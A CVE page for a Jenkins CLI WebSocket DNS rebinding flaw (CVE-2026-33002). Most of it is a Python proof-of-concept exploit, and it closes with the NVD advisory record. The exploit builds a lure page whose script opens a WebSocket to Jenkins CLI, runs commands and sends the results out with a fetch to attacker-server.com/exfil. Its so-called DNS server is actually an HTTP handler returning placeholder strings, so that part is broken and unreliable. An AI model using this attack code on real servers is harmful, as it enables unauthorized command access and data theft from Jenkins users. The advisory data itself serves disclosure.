CVE-2026-33002

#!/usr/bin/env python3 """ CVE-2026-33002 - Jenkins CLI WebSocket DNS Rebinding PoC This PoC demonstrates the DNS rebinding attack against Jenkins CLI WebSocket endpoint. Note: This is for educational and authorized testing purposes only. """ import http.server import socketserver import threading import time import socket # Configuration JENKINS_TARGET = "http://target-jenkins-server:8080" ATTACKER_DOMAIN = "attacker-controlled-domain.com" class MaliciousDNSHandler(http.server.BaseHTTPRequestHandler): """ Custom DNS handler that returns different IPs based on query count. First queries return attacker's IP, then switch to target Jenkins IP. """ query_count = 0 def do_GET(self): if "/dns-query" in self.path or self.path == "/": MaliciousDNSHandler.query_count += 1 if MaliciousDNSHandler.query_count <= 2: # First queries return attacker's IP (for initial page load) self.send_response(200) self.send_header('Content-Type', 'text/plain') self.end_headers() self.wfile.write(b"attacker-controlled-ip") else: # Subsequent queries return target Jenkins IP self.send_response(200) self.send_header('Content-Type', 'text/plain') self.end_headers() self.wfile.write(b"target-jenkins-ip") def log_message(self, format, *args): pass # Suppress logging def start_malicious_dns_server(port=8053): """Start DNS server for rebinding attack.""" with socketserver.TCPServer(('', port), MaliciousDNSHandler) as httpd: httpd.handle_request() def create_malicious_page(): """Generate malicious HTML page that initiates WebSocket connection.""" return f""" <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <script> // Wait for DNS cache to expire and rebind setTimeout(function() {{ // Initiate WebSocket connection to Jenkins CLI // The DNS will now resolve to the target Jenkins server const ws = new WebSocket( 'ws://{ATTACKER_DOMAIN}:8080/cli', ['jenkins-cli-cli'] ); ws.onopen = function() {{ console.log('WebSocket connected'); // Send CLI commands through WebSocket ws.send('who-am-i'); }}; ws.onmessage = function(event) {{ // Exfiltrate data to attacker server fetch('https://attacker-server.com/exfil?data=' + btoa(event.data)); }}; ws.onerror = function(error) {{ console.error('WebSocket error:', error); }}; }}, 5000); // Wait for DNS cache to clear </script> </body> </html> """ def exploit(): """ Main exploit function for CVE-2026-33002 """ print("[*] CVE-2026-33002 - Jenkins DNS Rebinding Attack") print("[*] Target: " + JENKINS_TARGET) print("[*] Attacker Domain: " + ATTACKER_DOMAIN) # Step 1: Start DNS server dns_thread = threading.Thread(target=start_malicious_dns_server) dns_thread.daemon = True dns_thread.start() print("[+] Malicious DNS server started on port 8053") # Step 2: Serve malicious page print("[+] Serving malicious page to target user...") print("[*] When user visits the page and Jenkins is logged in,") print("[*] WebSocket connection will be established and CLI commands executed.") # Note: In real attack, the malicious page would be hosted on attacker-controlled server # and target user would be tricked into visiting it if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-33002", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:28.187", "lastModified": "2026-03-21T00:18:44.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins 2.442 through 2.554 (both inclusive), LTS 2.426.3 through LTS 2.541.2 (both inclusive) performs origin validation of requests made through the CLI WebSocket endpoint by computing the expected origin for comparison using the Host or X-Forwarded-Host HTTP request headers, making it vulnerable to DNS rebinding attacks that allow bypassing origin validation."}, {"lang": "es", "value": "Jenkins 2.442 hasta 2.554 (ambos inclusive), LTS 2.426.3 hasta LTS 2.541.2 (ambos inclusive) realiza la validación de origen de las solicitudes realizadas a través del endpoint WebSocket de la CLI calculando el origen esperado para la comparación utilizando los encabezados de solicitud HTTP Host o X-Forwarded-Host, lo que lo hace vulnerable a ataques de reencuadernación de DNS que permiten eludir la validación de origen."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-350"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*", "versionStartIncluding": "2.426.3", "versionEndExcluding": "2.541.3", "matchCriteriaId": "B3638046-C2A7-4BEF-95E1-6E5C493DAA39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*", "versionStartIncluding": "2.442", "versionEndExcluding": "2.555", "matchCriteriaId": "7C72BD61-34BC-4609-9019-4C342792D538"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2026-03-18/#SECURITY-3674", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}